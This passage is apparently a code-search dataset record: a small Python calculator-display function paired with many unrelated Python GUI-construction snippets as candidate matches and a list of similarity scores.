cGUIf.get_ImgLabel(self,\n self.__pics[\"main_icon\"],\n 280 + common_x,\n 125 + common_y)\n\n\n #Create a subtitle that says \"options\"\n self.subtitleFont = font.Font(family = FONTS[\"courier new\"], size = 22)\n self.subtitle = cGUIf.get_TextLabel(self,\n \"Options\",\n self.subtitleFont,\n 240 + common_x,\n 195 + common_y)\n\n #Create a label that says \"Image Conversion\"\n self.conversionFont = font.Font(family = FONTS[\"times new roman\"], size = 15)\n self.imageConversionLabel = cGUIf.get_TextLabel(self,\n \" Image\\n Conversion\",\n self.conversionFont,\n 60 + common_x,\n 285 + common_y)\n\n #Create a button for Image Conversion\n self.imageButton = cGUIf.get_Button(self,\n \"\",\n lambda : self.switch_frames(\"image_frame\"),\n 190 + common_x,\n 270 + common_y)\n self.imageButton.configure(image = self.__pics[\"image_icon\"])\n\n #Create a label that says \"Audio Conversion\"\n self.audioConversionLabel = cGUIf.get_TextLabel(self,\n \" Audio\\n Conversion\",\n self.conversionFont,\n 440 + common_x,\n 285 + common_y)\n\n #Create a button for Audio Conversion\n self.audioButton = cGUIf.get_Button(self,\n \"\",\n lambda : self.switch_frames(\"audio_frame\"),\n 340 + common_x,\n 270 + common_y)\n self.audioButton.configure(image = self.__pics[\"audio_icon\"])\n\n #Create a label that says \"Doc Conversion\"\n self.docConversionLabel = cGUIf.get_TextLabel(self,\n \" Doc\\n Conversion\",\n self.conversionFont,\n 60 + common_x,\n 410 + 
common_y)\n\n\n #Create a button for Doc Conversion\n self.docButton = cGUIf.get_Button(self,\n \"\",\n lambda : self.switch_frames(\"doc_frame\"),\n 190 + common_x,\n 400 + common_y)\n self.docButton.configure(image = self.__pics[\"doc_icon\"])\n\n\n #Create a label that says \"Video Conversion\"\n self.videoConversionLabel = cGUIf.get_TextLabel(self,\n \" Video\\n Conversion\",\n self.conversionFont,\n 440 + common_x,\n 410 + common_y)\n\n #Create a button for Video Conversion\n self.videoButton = cGUIf.get_Button(self,\n \"\",\n lambda : self.switch_frames(\"video_frame\"),\n 340 + common_x,\n 400 + common_y)\n self.videoButton.configure(image = self.__pics[\"video_icon\"])", "def toControls(self,widget):", "def __init__(self):\n self.view = GuiView(self)\n return", "def init_UI(self):\n # widgets\n self.modeComboBox = QtWidgets.QComboBox()\n self.updateBtn = QtWidgets.QPushButton('Force Update')\n self.pauseBtn = QtWidgets.QPushButton()\n self.pauseBtn.setCheckable(True)\n\n self.clearBtn = QtWidgets.QPushButton()\n self.clearBtn.setIcon(QtGui.QIcon(IconPaths.ICON_CLEAR_FILES))\n self.filterBtn = QtWidgets.QToolButton()\n self.filterBtn.setIcon(QtGui.QIcon(IconPaths.ICON_FILTER))\n self.filterBtn.setMinimumWidth(35)\n self.filterBtn.setStyleSheet('QToolButton::menu-indicator {subcontrol-position: center right; height: 7px}')\n self.filterBtn.setPopupMode(QtWidgets.QToolButton.InstantPopup)\n self.prefBtn = QtWidgets.QToolButton()\n self.prefBtn.setIcon(QtGui.QIcon(IconPaths.ICON_SETTINGS))\n #self.pBar = QtWidgets.QProgressBar()\n self.itemView = LocalizeView()\n self.itemView.setModel(self.proxy_model)\n self.autoScrollCB = QtWidgets.QCheckBox('Auto scroll to localizing files')\n self.autoScrollCB.setChecked(True)\n\n # tweak sizes so the widgets all line up vertically with Nuke's style\n self.modeComboBox.setMinimumHeight(self.updateBtn.sizeHint().height())\n self.pauseBtn.setMaximumSize(self.updateBtn.sizeHint())\n self.clearBtn.setMaximumSize(self.updateBtn.sizeHint())\n\n # mode menu\n self.modeLabel = QtWidgets.QLabel('Mode')\n self.modeComboBox.addItems(['On', 'Manual', 'Off'])\n\n # update menu\n self.updateMenu = QtWidgets.QMenu()\n self.act_forceUpdateAll = QtWidgets.QAction('All', self)\n self.act_forceUpdateSelectedNodes = QtWidgets.QAction('Selected', self)\n self.act_forceUpdateOnDemand = QtWidgets.QAction('On demand only', self) \n self.updateMenu.addAction(self.act_forceUpdateAll)\n self.updateMenu.addAction(self.act_forceUpdateSelectedNodes)\n self.updateMenu.addAction(self.act_forceUpdateOnDemand)\n self.updateBtn.setMenu(self.updateMenu)\n\n # clear menu\n self.clearMenu = QtWidgets.QMenu()\n self.clearMenu.addAction(QtWidgets.QAction('All local files', self, triggered=self.__delete_all_local_files))\n self.clearMenu.addAction(QtWidgets.QAction('Unused local files', self, triggered=_open_delete_dialog))\n self.clearBtn.setMenu(self.clearMenu)\n\n # filter menu\n self.filterMenu = QtWidgets.QMenu(self.filterBtn)\n self.act_filter_all = QtWidgets.QAction('All', self.filterMenu, checkable=True)\n self.act_filter_in_progress = QtWidgets.QAction('In Progress', self.filterMenu, checkable=True)\n self.act_filter_up_to_date = QtWidgets.QAction('Up to date', self.filterMenu, checkable=True)\n self.act_filter_out_of_date = QtWidgets.QAction('Out of date', self.filterMenu, checkable=True)\n self.act_filter_from_source = QtWidgets.QAction('Reading from source', self.filterMenu, checkable=True)\n self.act_filter_disabled = QtWidgets.QAction('Disabled', self.filterMenu, 
checkable=True)\n self.act_filter_not_localized = QtWidgets.QAction('Not Localized', self.filterMenu, checkable=True)\n\n self.act_filter_in_progress.setData(Status.IN_PROGRESS)\n self.act_filter_up_to_date.setData(Status.UP_TO_DATE)\n self.act_filter_out_of_date.setData(Status.OUT_OF_DATE)\n self.act_filter_from_source.setData(Status.READ_FROM_SOURCE)\n self.act_filter_disabled.setData(Status.DISABLED)\n self.act_filter_not_localized.setData(Status.NOT_LOCALIZED)\n for act in (self.act_filter_all, self.act_filter_in_progress, self.act_filter_up_to_date, self.act_filter_out_of_date,\n self.act_filter_from_source, self.act_filter_disabled, self.act_filter_not_localized):\n self.filterMenu.addAction(act)\n self.filterBtn.setMenu(self.filterMenu)\n\n # tooltips\n self.modeComboBox.setToolTip('Sets the global localization mode.\\nThis is the same as using the options in the Cache/Localization/Mode menu.')\n self.updateBtn.setToolTip('Forces the update of localized files.\\nThis is the same as using the options in the Cache/Localization/Force Update menu.')\n self.pauseBtn.setToolTip('Pauses/Resumes file localization.\\nThis is the same as Cache/Localization/Pause.')\n self.clearBtn.setToolTip('''Allows for clearing localized files.\\nTwo modes are supported:\n \"All local files\" - this will delete all files in {}\n \"Unused local files\" - this will only delete unused local files (same as Cache/Localization/Clear Unused Local Files)'''.format(nuke.toNode('preferences')['localCachePath'].evaluate()))\n self.filterBtn.setToolTip('Sets a view filter the table.')\n self.prefBtn.setToolTip('Open the preferences.')\n\n # layouts\n layout = QtWidgets.QVBoxLayout()\n btnLayout = QtWidgets.QHBoxLayout()\n btnLayout.addWidget(self.modeLabel)\n btnLayout.addWidget(self.modeComboBox)\n btnLayout.addWidget(self.updateBtn)\n btnLayout.addWidget(self.pauseBtn)\n btnLayout.addWidget(self.clearBtn)\n btnLayout.addStretch()\n btnLayout.addWidget(self.filterBtn)\n btnLayout.addWidget(self.prefBtn)\n layout.addLayout(btnLayout)\n #layout.addWidget(self.pBar)\n layout.addWidget(self.itemView)\n layout.addWidget(self.autoScrollCB)\n layout.setAlignment(self.autoScrollCB, QtCore.Qt.AlignRight)\n self.setLayout(layout)", "def ui_setup(self):\n loader = QUiLoader()\n file = QFile('./user_interface/form/main_window.ui')\n file.open(QFile.ReadOnly)\n self._window = loader.load(file)\n file.close()\n\n status_bar = QStatusBar(self._window)\n status_bar.showMessage(__copyright__)\n self._window.setStatusBar(status_bar)\n self._window.setWindowIcon(QIcon('./user_interface/media/bucketing_icon.jpeg'))\n self._window.setWindowTitle('PySide2 Project - Basic UI Framework')\n\n self._option_panel = OptionPanel()\n self._option_panel.add_button('DekBan', './user_interface/media/dekban.png')\n self._option_panel.add_button('Charlie', './user_interface/media/charlie.jpeg')\n self._option_panel.add_button('Simon', './user_interface/media/Simon.jpeg')\n\n # Add widget to main layout\n main_layout = self._window.main_layout\n main_layout.itemAtPosition(0, 0).setAlignment(QtCore.Qt.AlignCenter)\n main_layout.itemAtPosition(0, 1).setAlignment(QtCore.Qt.AlignVCenter)\n main_layout.addWidget(self._option_panel, 2, 0, 1, 1)\n\n # Add page widget to stack\n self._pages['item'] = ItemWidget()\n self._pages['text1'] = TextPage(text=PAUSE_TEXT)\n self._pages['text2'] = TextPage(text=STOP_TEXT)\n\n for index, name in enumerate(self._pages):\n print('pages {} : {} page'.format(index, name))\n 
self._window.widget_stack.addWidget(self._pages[name].widget)\n\n self._window.widget_stack.setCurrentIndex(0)\n\n # Build up signal / slot\n self._option_panel.currentItemChanged.connect(self.set_page)", "def __init__(self):\n\t\tself.walltime_edit = urwid.Edit( ('editcp',\"walltime=\"), \"200:00:00\" )\n\t\tself.nodes_edit = urwid.IntEdit( ('editcp', \"nodes=\"), 0 )\n\t\tself.myri_ppn_edit = urwid.IntEdit( ('editcp', \"myri:ppn=\"), 4)\n\t\tself.workdir_edit = urwid.Edit( (\"editcp\", \"WORKDIR(-d) \"), '~/qjob_output')\n\t\tself.runtime_output_checkbox = urwid.CheckBox(\"See output while running\")\n\t\tself.other_options_edit = urwid.Edit( (\"editcp\", \"others:\"), '-q cmb -j oe -S /bin/bash')\n\t\tself.source_bash_profile_checkbox = urwid.CheckBox(\"source ~/.bash_profile\")\n\t\tself.source_bash_profile_checkbox.set_state(True)\n\t\tself.just_write_down_checkbox = urwid.CheckBox(\"Write jobfile. No submission.\")\n\t\tself.jobname_prefix_edit = urwid.Edit( (\"editcp\", \"jobname_prefix:\"), '~/qjob/job')\n\t\tself.jobnumber_edit = urwid.IntEdit( (\"editcp\", \"job number:\"), 0)\n\t\tself.job_content_reset_button = urwid.Button(\"Job Content Reset\", self.job_content_reset)\n\t\tself.exit_button = urwid.Button(\"Exit\", self.program_exit)\n\t\tself.job_edit = urwid.Edit( ('editcp',\"\"), multiline=True )\n\t\t\n\t\tself.items = [\n\t\turwid.Padding(\n\t\t\turwid.Columns(\n\t\t\t\t[\n\t\t\t\turwid.AttrWrap( self.walltime_edit, 'editbx', 'editfc' ),\n\t\t\t\turwid.AttrWrap( self.nodes_edit, 'editbx', 'editfc'),\n\t\t\t\turwid.AttrWrap( self.myri_ppn_edit, 'editbx', 'editfc'),\n\t\t\t\t],\n\t\t\t\t2 ), \n\t\t\t('fixed left',2), ('fixed right',2)),\n\t\tblank,\n\t\turwid.Padding(\n\t\t\turwid.Columns(\n\t\t\t\t[\n\t\t\t\turwid.AttrWrap( self.workdir_edit, 'editbx', 'editfc' ), \n\t\t\t\turwid.AttrWrap( self.runtime_output_checkbox, 'buttn', 'buttnf'),\n\t\t\t\t],\n\t\t\t\t2),\n\t\t\t('fixed left',2), ('fixed right',2)),\n\t\tblank,\n\t\turwid.Padding(\n\t\t\turwid.AttrWrap( self.other_options_edit, 'editbx', 'editfc' ), ('fixed left',2), ('fixed right',2)),\n\t\tblank,\n\t\turwid.Padding(\n\t\t\turwid.GridFlow(\n\t\t\t\t[\n\t\t\t\turwid.AttrWrap( self.source_bash_profile_checkbox, 'buttn','buttnf'),\n\t\t\t\turwid.AttrWrap( self.just_write_down_checkbox, 'buttn', 'buttnf'),\n\t\t\t\turwid.AttrWrap( self.jobname_prefix_edit, 'editbx', 'editfc' ),\n\t\t\t\turwid.AttrWrap( self.jobnumber_edit, 'editbx', 'editfc' ),\n\t\t\t\turwid.AttrWrap(self.job_content_reset_button, 'buttn', 'buttnf'),\n\t\t\t\turwid.AttrWrap(self.exit_button, 'buttn', 'buttnf'),\n\t\t\t\t],\n\t\t\t\t34, 2, 1, 'left'),\n\t\t\t('fixed left',2), ('fixed right',2)),\n\t\tblank,\n\t\turwid.Padding(\n\t\t\turwid.Pile(\n\t\t\t[\n\t\t\turwid.Text('One line one job. One job with >1 commands put on one line, separated by ;'),\n\t\t\turwid.AttrWrap(self.job_edit, 'editbx', 'editfc'),\n\t\t\t], 1),\n\t\t\t('fixed left',2), ('fixed right',2) )\n\t\t\t\n\t\t]\n\t\t\n\t\tself.listbox = urwid.ListBox( self.items )\n\t\t\n\t\tinstruct = urwid.Text(\"Job submission program based on Urwid. 
F8 to submit, F12 to quit.\")\n\t\theader = urwid.AttrWrap( instruct, 'header' )\n\t\t\n\t\tself.footer_text = urwid.Text(\"Mar 15th, 2008 by Yu Huang\")\n\t\tfooter = urwid.AttrWrap(self.footer_text, 'footer')\n\t\t\n\t\tself.top_frame = urwid.Frame(urwid.AttrWrap(self.listbox, 'body'), header, footer)", "def layout(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def initCentralUic(self):\n self.initFileTableWidget()\n self.initViewerStack()\n self.splitter.setSizes([150, 850])", "def build_ui(self):\n\n self.frame.columnconfigure(0, pad=20)\n self.frame.columnconfigure(1, pad=20)\n\n\n self.frame.rowconfigure(0, pad=3)\n self.frame.rowconfigure(1, pad=3)\n self.frame.rowconfigure(2, pad=3)\n\n p1_label = Label(self.frame)\n p1_label[\"text\"] = \"Player 1\"\n p1_label.grid(row=0, column=0)\n\n p2_label = Label(self.frame)\n p2_label[\"text\"] = \"Player 2\"\n p2_label.grid(row=0, column=1)\n\n self.lb1 = Listbox(self.frame)\n for script in self.ai_list:\n self.lb1.insert(END, script)\n self.lb1.grid(row=1, column=0)\n\n self.lb1.selection_set(0)\n self.lb1[\"exportselection\"] = 0\n\n self.lb2 = Listbox(self.frame)\n for script in self.ai_list:\n self.lb2.insert(END, script)\n self.lb2.grid(row=1, column=1)\n\n self.lb2.selection_set(0)\n self.lb2[\"exportselection\"] = 0\n\n start_game_button = Button(self.frame)\n start_game_button[\"text\"] = \"Start Game\"\n start_game_button[\"command\"] = self.start_game\n start_game_button.grid(row=2, column=0)\n\n self.check_box = Checkbutton(self.frame, text=\"Draw UI\",variable=self.ui_draw)\n self.check_box.grid(row=2,column=1)\n\n self.frame.pack()", "def getControls(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def setUI(self):\n \n l = QtGui.QLabel(\"Open file:\")\n browseButton = QtGui.QPushButton(\"Browse\")\n analyzeButton = QtGui.QPushButton(\"Analyse\")\n self.filelabel = QtGui.QLabel(\"\")\n self.messageLabel = QtGui.QLabel(\"\")\n \n #camera intrasec values\n self.fxlabel = QtGui.QLabel('focal x')\n self.fylabel = QtGui.QLabel('focal y')\n self.dist1label = QtGui.QLabel('K1')\n self.dist2label = QtGui.QLabel('K2')\n self.dist3label = QtGui.QLabel('P1')\n self.dist4label = QtGui.QLabel('P2')\n\n #set layout\n self.grid = QtGui.QGridLayout()\n a = self.grid.addWidget\n a(l, 0,0)\n a(browseButton, 0,2)\n a(self.filelabel,0,1)\n a(self.messageLabel, 1,0,1,4)\n a(analyzeButton, 2,0,1,4)\n\n a(self.fxlabel, 3,0)\n a(self.fylabel, 3,1)\n a(self.dist1label, 4,0)\n a(self.dist2label, 5,0)\n a(self.dist3label, 6,0)\n a(self.dist4label, 7,0)\n\n self.setLayout(self.grid)\n\n\n #connect signals to methods\n self.connect(browseButton, QtCore.SIGNAL('clicked()'), self.onOpenFileClicked)\n self.connect(analyzeButton, QtCore.SIGNAL('clicked()'), self.startAnalyze)", "def __init__(self, parent):\r\n Frame.__init__(self, parent) \r\n \r\n self.parent = parent\r\n self.initUI()", "def create_widgets(self):\n # self.var_spherical = IntVar()\n # self.var_3d = IntVar()\n # self.var_spatial_audio = IntVar()\n # self.button_open[\"command\"] = self.action_open\n # self.button_inject[\"command\"] = self.action_inject\n pass", "def create_widgets(self):\n #create description label\n Label(self,\n text = \"Patient Info:\"\n ).grid(row = 0, column = 0, sticky = W)", "def 
pick_up(self):", "def _init_ui(self):\n\n hlayout = QtWidgets.QHBoxLayout()\n\n label = QtWidgets.QLabel('Kies een normtraject:')\n\n hlayout.addWidget(label)\n\n self.section_combobox = QtWidgets.QComboBox()\n self.section_combobox.setFixedWidth(60)\n self.section_ids = sorted([''] + io.geometry.import_section_ids(self.datadir))\n self.section_combobox.addItems(self.section_ids)\n\n hlayout.addWidget(self.section_combobox)\n\n self.add_button = QtWidgets.QPushButton('Toevoegen', clicked=self._add_flooddefence)\n\n hlayout.addWidget(self.add_button)\n\n vlayout = QtWidgets.QVBoxLayout()\n vlayout.addLayout(hlayout)\n\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n\n vlayout.addWidget(line)\n\n self.close_button = QtWidgets.QPushButton('Sluiten', clicked=self.close)\n vlayout.addWidget(self.close_button, 0, QtCore.Qt.AlignRight)\n\n self.setLayout(vlayout)\n\n self.setWindowTitle(\"HB Havens: normtrajecten\")\n self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)", "def main():\n \n cities, coordinates, speedlimits, adjlist = data_for_app()\n \n ui(cities, coordinates, speedlimits, adjlist)", "def _init_ui(self):\n hlayout = QtWidgets.QHBoxLayout()\n\n hlayout.addWidget(QtWidgets.QLabel('Kies een normtraject:'))\n\n self.section_combobox = QtWidgets.QComboBox()\n self.section_combobox.setFixedWidth(60)\n self._update_combobox()\n\n hlayout.addWidget(self.section_combobox)\n\n self.remove_button = QtWidgets.QPushButton('Verwijderen', clicked=self._del_flooddefence)\n hlayout.addWidget(self.remove_button)\n\n vlayout = QtWidgets.QVBoxLayout()\n vlayout.addLayout(hlayout)\n\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n\n vlayout.addWidget(line)\n\n self.close_button = QtWidgets.QPushButton('Sluiten', clicked=self.close)\n vlayout.addWidget(self.close_button, 0, QtCore.Qt.AlignRight)\n\n self.setLayout(vlayout)\n\n self.setWindowTitle(\"HB Havens: normtrajecten\")\n self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)" ]
[ "0.8035472", "0.7076582", "0.70445716", "0.70445716", "0.679653", "0.6779092", "0.6768436", "0.67298573", "0.66679484", "0.6657647", "0.6619304", "0.6563466", "0.6519952", "0.6507672", "0.6497", "0.6435492", "0.6433124", "0.64304245", "0.6426558", "0.64145607", "0.6411895", "0.63966846", "0.63821864", "0.6378462", "0.63660645", "0.6329955", "0.6319039", "0.6288673", "0.6279066", "0.62741995", "0.62629026", "0.6262061", "0.6244824", "0.62372714", "0.6230384", "0.6230384", "0.6230384", "0.621231", "0.62121016", "0.61987257", "0.6197478", "0.619624", "0.6176559", "0.6167978", "0.6162372", "0.6150112", "0.6143135", "0.61420125", "0.61417943", "0.61235595", "0.61145604", "0.61143094", "0.6093009", "0.6090125", "0.60880417", "0.6081076", "0.60786545", "0.60722893", "0.60722893", "0.60712576", "0.60683936", "0.60640395", "0.6063467", "0.60562503", "0.60538983", "0.60519123", "0.60452074", "0.6041096", "0.60296243", "0.6026632", "0.6004169", "0.6004159", "0.6003965", "0.60016537", "0.6000898", "0.6000898", "0.6000898", "0.6000898", "0.6000898", "0.6000898", "0.59876895", "0.5985827", "0.59832495", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.59820217", "0.5979457", "0.5976639", "0.5975319", "0.5973593", "0.5969149", "0.5957561", "0.5956354" ]
0.0
-1
This will add to the display, and be the go to function of most buttons. We'll want to add in conditions for what buttons go.
def add(text): orig = dispb["text"] new = orig + text ops = ["+","-","*","/"] # conditions # length 21 if len(new) > 21: dispb["text"] = orig return 0 # one calc at a time if len(orig) > 0: if (orig[-1] in ops) & (text in ops): dispb["text"] = orig return 0 dispb["text"] = new return 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def display(self):\n\t\tprint('The button in the window was clicked!')", "def show_main_buttons(self):\n pass", "def _add_buttons(self, gui):\n gui.greet_button.pack()\n gui.close_button.pack()\n gui.buttons_on.set(True)", "def load_buttons(self):\n self.playing_buttons.append(Button(20, 40, 100, 40, \"New Game\"))", "def battle_screen_history_bar_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n\n\n for number,text in button_status.battle_screen_history_bar_text_dict.items():\n if int(number) == 1:\n button_text = Button(text,'', (0,0,0),250, 0, 600, 30, font_size = 13, alpha = 100)\n button_text.update()\n button_text.draw(screen)\n else:\n pass\n\n button_details = Button('+','', (0,0,0),850, 0, 100, 30,font_size = 25, alpha = 100)\n button_details.update()\n button_details.draw(screen)\n\n if button_status.battle_screen_history_bar_detail_display == True:\n i = 0\n for number,text in button_status.battle_screen_history_bar_text_dict.items():\n\n if int(number) % 2 == 1 and text != '':\n if text == \"Game Started!\":\n button_odd = Button(text,'', (0,160,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif text == \"Your turn has started\":\n button_odd = Button(text,'', (0,160,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif text == \"Opponent's turn has started\":\n button_odd = Button(text,'', (160,0,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n else:\n button_odd = Button(text,'', (160,160,160),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif int(number) % 2 == 0 and text != '':\n if text == \"Game Started!\":\n button_even = Button(text,'', (0,160,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n elif text == \"Your turn has started\":\n button_even = Button(text,'', (0,160,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n elif text == \"Opponent's turn has started\":\n button_even = Button(text,'', (160,0,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n else:\n button_even = Button(text,'', (130,130,130),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1", "def battle_screen_my_hand_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n if screen_status.battle_screen_action_indicator != 'stage-0':\n # Page forward button\n button1 = Button('>','', (0,0,0),1100, 660, 50, 50)\n # Edge cases when len() = 14,28,42 ...\n if len(user.hand_list) % 7 == 0 and len(user.hand_list) != 0:\n if screen_status.battle_screen_my_hand_page_id != ((len(user.hand_list))//7): # Make sure on the last page no foreward button shows up\n button1.update()\n button1.draw(screen)\n # Normal cases\n else:\n if screen_status.battle_screen_my_hand_page_id != ((len(user.hand_list))//7 + 1): # Make sure on the last page no foreward button shows up\n button1.update()\n button1.draw(screen)\n # Page backward button\n button2 = Button('<', '' ,(0,0,0),50, 660, 50, 50)\n if screen_status.battle_screen_my_hand_page_id != 1: # Make sure on the first page no backward button shows up\n button2.update()\n button2.draw(screen)\n #\n if 
button_status.battle_screen_my_hand_page_change_button_backend:\n buttons.extend((button1,button2))\n button_status.battle_screen_my_hand_page_change_button_backend = False\n if ((screen_status.battle_screen_action_indicator == 'stage-1-level-up'\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'detail' in screen_status.battle_screen_action_indicator)\n or 'stage-2-other-action-detail-spawn' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-think-fast' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-equip' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-sneak' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-tactic-1' in screen_status.battle_screen_action_indicator)\n and (screen_status.battle_screen_player2_action_display_indicator == False)):\n if button_status.battle_screen_my_hand_indicator_display == True:\n located_card = user.hand_list[7*(screen_status.battle_screen_my_hand_page_id - 1)+(int(button_status.battle_screen_my_hand_indicator_position)-1)]\n\n button_top = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y - 5, 140, 5)\n button_top.update()\n button_top.draw(screen)\n\n button_bottom = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y + 180, 140, 5)\n button_bottom.update()\n button_bottom.draw(screen)\n\n button_left = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y, 5, 180)\n button_left.update()\n button_left.draw(screen)\n\n button_right = Button('','', (250,0,0),located_card.rect.x + 130, located_card.rect.y , 5, 180)\n button_right.update()\n button_right.draw(screen)\n # button_level_up = Button('***','battle_screen_handaction_****', (70,70,150),located_card.rect.x+10, located_card.rect.y - 27, 115, 27)\n # button_level_up.update()\n # button_level_up.draw(screen)", "def generate_buttons(self):\n raise Exception('Implement me!')", "def update_buttons(self):\n # Enable the Add/Remove step buttons if a Generator is loaded\n enable = self.mgr.obj is not None\n self.addButton.setEnabled(enable)\n self.removeButton.setEnabled(enable)\n self.upButton.setEnabled(enable)\n self.downButton.setEnabled(enable)", "def addStdButtons (self,frame):\n \n # Create the ok and cancel buttons.\n self.ok = ok = Tk.Button(frame,text=\"Go\",width=6,command=self.go)\n self.hide = hide = Tk.Button(frame,text=\"Hide\",width=6,command=self.hide)\n \n ok.pack(side=\"left\",pady=2,padx=5)\n hide.pack(side=\"left\",pady=2,padx=5)", "def step_button(self):\r\n self.update_settings()\r\n self.set_val(\"display_move\")\r\n if self.step_call is not None:\r\n self.step_call()", "def _addActionsToMoveButtons(self) -> None:\n self._goBackBtn.setDefaultAction(self._goBackAction)\n self._goUpBtn.setDefaultAction(self._goUpAction)\n self._goForwardBtn.setDefaultAction(self._goForwardAction)", "def sprint(self):\n self.buttons = []\n self.screen.blit(self.background_image, (0, 0))\n self.create_button((self.width // 2 - 257, self.height // 8 - 85), 501, 200, Colors.BLACK, \"20L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 3 - 81), 501, 200, Colors.BLACK, \"40L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 5 - 86), 501, 200, Colors.BLACK, \"100L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 7 - 85), 501, 200, Colors.BLACK, \"1000L\")\n self.show_buttons()\n self.show_text_in_buttons()\n pygame.display.flip()", "def 
battle_screen_character_1_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n button_basic_info = Button('Lv: ' + user.character_card.level + ' HP: ' + user.character_card.health + ' Card #: ' + str(len(user.hand_list)),'', (0,0,0),1000, 0, 200, 30, alpha = 100)\n button_basic_info.update()\n button_basic_info.draw(screen)\n\n if ('stage-2-character-action-1' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,132,50,23,alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-character-action-2' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,155,50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-character-action-3' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,178,50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-other-action-' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False\n and 'detail' not in screen_status.battle_screen_action_indicator):\n x = screen_status.battle_screen_action_indicator.replace('stage-2-other-action-','')\n button_action_pointer = Button('>>','',(92,13,78),1000,220+23*(int(x)/10-1),50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)", "def lobby_screen_stable_button_display(ai_settings,grid, screen, buttons, screen_status, button_status, card_database_filter, user, player2):\n button_back = Button('Back','', (250,250,250),0, 0, 50, 50, font_size = 18, font_color = (0,0,0),alpha = 200)\n button_back.update()\n button_back.draw(screen)\n\n button1 = Button('Hello '+ user.name +'!','', (250,250,250),300, 0, 600, 50, font_size = 20, font_color = (0,0,0),alpha = 200)\n button1.update()\n button1.draw(screen)\n\n button_back = Button('Change Name','', (150,40,40),780, 10, 110, 30, font_size = 14,alpha = 200)\n button_back.update()\n button_back.draw(screen)\n # background for create game\n button2 = Button('','', (0,0,0),150, 580, 900, 181,alpha = 200)\n button2.update()\n button2.draw(screen)\n if button_status.lobby_screen_prepare_to_go_display == False:\n # Background for join existing game\n button3 = Button('','', (0,0,0),150, 70, 900, 500,alpha = 200)\n button3.update()\n button3.draw(screen)\n\n button4 = Button('Join an existing game:','', (0,0,0),400, 70, 400, 50, font_size = 20, alpha = 0)\n button4.update()\n button4.draw(screen)", "def welcome_screen_settings_menu_display(ai_settings,screen, buttons, screen_status, button_status):\n if button_status.welcome_screen_settings_display == True:\n\n button = Button('','', (0,0,0), 300, 300, 600, 400, alpha = 200)\n button.update()\n button.draw(screen)\n # Sound settings\n button_sound = Button('Sound: ','', (0,0,0), 330, 330, 150, 50, font_size = 40, alpha = 0)\n button_sound.update()\n button_sound.draw(screen)\n\n if ai_settings.sound_indicator == True:\n button_1 = Button('On','', (50,150,50), 510, 333, 40, 40)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,150,150), 560, 333, 40, 40)\n 
